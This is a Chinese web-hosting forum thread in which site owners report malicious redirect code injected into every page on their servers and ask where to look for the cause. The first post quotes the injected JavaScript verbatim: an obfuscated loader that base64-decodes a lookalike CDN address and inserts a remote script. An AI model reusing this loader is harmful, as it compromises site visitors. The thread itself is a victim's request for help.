【已解答】服务器上所有网站都被插入木马代码，该检查...

服务器上所有网站都被插入木马代码，检查网站文件均正常，但是访问网站每个页面都被插入跳转代码

(function(){var hm=document.createElement("script");hm.src=atob("aHR0cHM6Ly9jZG4uc3RhdGljZmxsZS5jb20vanF1ZXJ5LzMuNy4xL2pxdWVyeS5taW4uanM=");var s=document.getElementsByTagName("script")[0];s.parentNode.insertBefore(hm,s);})();

复制代码

这个是哪里可能有问题导致的？该检查哪里呢？

阿珂 · 发表于 2026-1-26 17:01:11

如需安全运维服务，可联系我司安全运维客户经理

mingtian5ce23 · 发表于 2026-1-26 17:11:54

/var/tmp/ 和 /tmp 目录出现多个木马文件，反复删除，重装nginx始终无效。切换Apache目前未发现挂马。

宝塔用户_hjcoqo · 发表于 2026-1-29 01:15:17

您好，我现在遇到了相似的问题，前端页面被注入恶意代码，怀疑是宝塔0day，想问问您有找到攻击路径吗？如果方便的话，可以给我一个宝塔版本号便于分析总结吗